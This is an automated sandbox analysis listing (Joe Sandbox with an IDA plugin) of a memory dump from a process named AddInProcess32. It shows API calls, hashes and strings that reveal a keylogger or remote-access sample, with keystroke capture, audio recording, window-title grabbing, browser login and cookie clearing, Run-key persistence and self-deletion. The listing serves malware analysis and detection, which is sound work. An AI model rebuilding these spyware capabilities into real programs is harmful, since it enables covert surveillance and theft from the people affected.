                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                        • String ID: GetLastInputInfo$User32.dll
                                                                                                        • API String ID: 2574300362-1519888992
                                                                                                        • Opcode ID: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
                                                                                                        • Instruction ID: 425bdc246283df71b7ad83aa0519e38d385401eab2b134f4ae8d574857069069
                                                                                                        • Opcode Fuzzy Hash: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
                                                                                                        • Instruction Fuzzy Hash: D7B092B85843849BC7202BE0BC0DA297BA4FA48B43720447AF406D11A1EB7881809F6F
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __alldvrm$_strrchr
                                                                                                        • String ID:
                                                                                                        • API String ID: 1036877536-0
                                                                                                        • Opcode ID: 63f75d4c6ddf9dfadee5a9a28b1451e266bcc439c32975fae3941ae33d1a5297
                                                                                                        • Instruction ID: 63a095292c52d92af2bf19a392fdfa9b0d117a80b68c781492b1ecdde0b53e6f
                                                                                                        • Opcode Fuzzy Hash: 63f75d4c6ddf9dfadee5a9a28b1451e266bcc439c32975fae3941ae33d1a5297
                                                                                                        • Instruction Fuzzy Hash: 60A168729042469FFB21CF58C8817AEBBE2EF55314F24416FE5849B382DA3C8D45C759
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d2c3ac181d975cfacaee5c3ec40136b8bdf5b2422b9dd14ab5655829a2308330
                                                                                                        • Instruction ID: 90b3d0a8f148eb65ba096d855dd205fb67a40d318d5acb0a54968c3478788488
                                                                                                        • Opcode Fuzzy Hash: d2c3ac181d975cfacaee5c3ec40136b8bdf5b2422b9dd14ab5655829a2308330
                                                                                                        • Instruction Fuzzy Hash: 10412B71A00744AFF724AF78CC41B6ABBE8EF88714F10452FF511DB291E679A9458788

Strings
• [Cleared browsers logins and cookies.], xrefs: 0040B8DE
• Cleared browsers logins and cookies., xrefs: 0040B8EF
Memory Dump Source
• Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
Similarity
• API ID: Sleep
• String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
• API String ID: 3472027048-1236744412

APIs
  • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
  • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
  • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
• Sleep.KERNEL32(00000BB8), ref: 004115C3
Memory Dump Source
• Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
Similarity
• API ID: CloseOpenQuerySleepValue
• String ID: @CG$exepath$BG
• API String ID: 4119054056-3221201242

APIs
  • Part of subcall function 0041B6E6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B6F6
  • Part of subcall function 0041B6E6: GetWindowTextLengthW.USER32(00000000), ref: 0041B6FF
  • Part of subcall function 0041B6E6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B729
• Sleep.KERNEL32(000001F4), ref: 00409C95
• Sleep.KERNEL32(00000064), ref: 00409D1F
Memory Dump Source
• Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
Similarity
• API ID: Window$SleepText$ForegroundLength
• String ID: [ $ ]
• API String ID: 3309952895-93608704

APIs
• ___BuildCatchObject.LIBVCRUNTIME ref: 0043810F
  • Part of subcall function 0043805C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043808B
  • Part of subcall function 0043805C: ___AdjustPointer.LIBCMT ref: 004380A6
• _UnwindNestedFrames.LIBCMT ref: 00438124
• __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438135
• CallCatchBlock.LIBVCRUNTIME ref: 0043815D
Memory Dump Source
• Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
Similarity
• API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
• API String ID: 737400349-0

APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004471B7,00000000,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue), ref: 00447242
• GetLastError.KERNEL32(?,004471B7,00000000,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446F91), ref: 0044724E
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471B7,00000000,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044725C
Memory Dump Source
• Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
Similarity
• API ID: LibraryLoad$ErrorLast
• API String ID: 3177248105-0

APIs
• CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
• GetFileSize.KERNEL32(00000000,00000000), ref: 0041B647
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041B66C
• CloseHandle.KERNEL32(00000000), ref: 0041B67A
Memory Dump Source
• Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
Similarity
• API ID: File$CloseCreateHandleReadSize
• API String ID: 3919263394-0

APIs
• GetSystemMetrics.USER32(0000004C), ref: 00418519
• GetSystemMetrics.USER32(0000004D), ref: 0041851F
• GetSystemMetrics.USER32(0000004E), ref: 00418525
• GetSystemMetrics.USER32(0000004F), ref: 0041852B
Memory Dump Source
• Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
Similarity
• API ID: MetricsSystem
• API String ID: 4116985748-0

APIs
• OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
• OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
• CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3D3
• CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3DB
Memory Dump Source
• Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
Similarity
• API ID: CloseHandleOpenProcess
• API String ID: 39102293-0

APIs
• __startOneArgErrorHandling.LIBCMT ref: 00441F6D
Memory Dump Source
• Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
Similarity
• API ID: ErrorHandling__start
• String ID: pow
• API String ID: 3213639722-2276729525

APIs
• GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB59
Memory Dump Source
• Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
Similarity
• API ID: Info
• String ID: $fD
• API String ID: 1807457897-3092946448

APIs
• GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00450B39,?,00000050,?,?,?,?,?), ref: 004509B9
Memory Dump Source
• Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
Similarity
• String ID: ACP$OCP
• API String ID: 0-711371036
APIs
• GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 004049F1
  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
• GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 00404A4E
Strings
• KeepAlive | Enabled | Timeout: , xrefs: 004049E5
Memory Dump Source
• Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
• API ID: LocalTime
• String ID: KeepAlive | Enabled | Timeout:
• API String ID: 481472006-1507639952
APIs
• GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
Memory Dump Source
• Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
• API ID: LocalTime
• String ID: | $%02i:%02i:%02i:%03i
• API String ID: 481472006-2430845779
APIs
• PathFileExistsW.SHLWAPI(00000000), ref: 00419EAE
Memory Dump Source
• Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
• API ID: ExistsFilePath
• String ID: alarm.wav$xIG
• API String ID: 1174141254-4080756945
APIs
  • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
  • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
• CloseHandle.KERNEL32(?), ref: 0040A7CA
• UnhookWindowsHookEx.USER32 ref: 0040A7DD
Memory Dump Source
• Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
• API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
• String ID: Online Keylogger Stopped
• API String ID: 1623830855-1496645233
APIs
• waveInPrepareHeader.WINMM(?,00000020,?,?,00000000,00475B70,00473EE8,?,00000000,00401913), ref: 00401747
• waveInAddBuffer.WINMM(?,00000020,?,00000000,00401913), ref: 0040175D
Memory Dump Source
• Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
• API ID: wave$BufferHeaderPrepare
• String ID: T=G
• API String ID: 2315374483-379896819
APIs
• IsValidLocale.KERNEL32(00000000,j=D,00000000,00000001,?,?,00443D6A,?,?,?,?,00000004), ref: 004477DC
Memory Dump Source
• Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
• API ID: LocaleValid
• String ID: IsValidLocaleName$j=D
• API String ID: 1901932003-3128777819
APIs
Memory Dump Source
• Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
• API ID: H_prolog
• String ID: T=G$T=G
• API String ID: 3519838083-3732185208
APIs
• GetKeyState.USER32(00000011), ref: 0040AD5B
  • Part of subcall function 00409B10: GetForegroundWindow.USER32(?,?,004740F8), ref: 00409B3F
  • Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
  • Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52
  • Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
  • Part of subcall function 00409B10: GetKeyboardState.USER32(?,?,004740F8), ref: 00409B67
  • Part of subcall function 00409B10: ToUnicodeEx.USER32(0047414C,?,?,?,00000010,00000000,00000000), ref: 00409B8A
  • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
  • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
Memory Dump Source
• Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
• API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
• String ID: [AltL]$[AltR]
• API String ID: 2738857842-2658077756
APIs
• _free.LIBCMT ref: 00448825
  • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
  • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
Memory Dump Source
• Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
• API ID: ErrorFreeHeapLast_free
• String ID: `@$`@
• API String ID: 1353095263-20545824
APIs
• GetKeyState.USER32(00000012), ref: 0040ADB5
Memory Dump Source
• Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
• API ID: State
• String ID: [CtrlL]$[CtrlR]
• API String ID: 1649606143-2446555240
APIs
• RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040BFB2,00000000,004742E0,004742F8,?,pth_unenc), ref: 00412988
• RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00412998
Strings
• Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412986
Memory Dump Source
• Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
• API ID: DeleteOpenValue
• String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
• API String ID: 2654517830-1051519024
                                                                                                        • Opcode ID: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                                                        • Instruction ID: 4813e9247c8a4fa7715124fbb4df20ddc3d96ddce1d5e270e7c0f337b45b5704
                                                                                                        • Opcode Fuzzy Hash: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                                                        • Instruction Fuzzy Hash: 0AE01270310304BFEF104F61ED06FDB37ACBB80B89F004165F505E5191E2B5DD54A658
                                                                                                        APIs
                                                                                                        • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040AF84
                                                                                                        • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040AFAF
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: DeleteDirectoryFileRemove
                                                                                                        • String ID: pth_unenc
                                                                                                        • API String ID: 3325800564-4028850238
                                                                                                        • Opcode ID: b246b6ffa53a22d2799d5431088e9539915b729032b3d26a74de246411d0112c
                                                                                                        • Instruction ID: b68931c7331ddc333ece9e06749e281aefc344294653c9eba2f2de372e339d66
                                                                                                        • Opcode Fuzzy Hash: b246b6ffa53a22d2799d5431088e9539915b729032b3d26a74de246411d0112c
                                                                                                        • Instruction Fuzzy Hash: FEE046715112108BC610AB31EC44AEBB398AB05316F00487FF8D3A36A1DE38A988CA98
                                                                                                        APIs
                                                                                                        • TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                        • WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ObjectProcessSingleTerminateWait
                                                                                                        • String ID: pth_unenc
                                                                                                        • API String ID: 1872346434-4028850238
                                                                                                        • Opcode ID: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                                                                                                        • Instruction ID: 4302d9c34f7b4dbdac7fc8682473a51625df35810590c52ad239c14707b44b4b
                                                                                                        • Opcode Fuzzy Hash: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                                                                                                        • Instruction Fuzzy Hash: C1D0C938559211AFD7614B68BC08B453B6AA745222F108277F828413F1C72598A4AE1C
                                                                                                        APIs
                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FAF4
                                                                                                        • GetLastError.KERNEL32 ref: 0043FB02
                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB5D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharMultiWide$ErrorLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 1717984340-0
                                                                                                        • Opcode ID: a3a9a9c7793c2081db5377885f607edf127f94d6c053b0090e31d102b176707d
                                                                                                        • Instruction ID: ecac45699e256c48587d6f27f66036641a8fb520bb473c9b2adecd150689d728
                                                                                                        • Opcode Fuzzy Hash: a3a9a9c7793c2081db5377885f607edf127f94d6c053b0090e31d102b176707d
                                                                                                        • Instruction Fuzzy Hash: 65414871E00206AFCF258F65C854ABBFBA4EF09310F1451BAF858973A1DB38AD09C759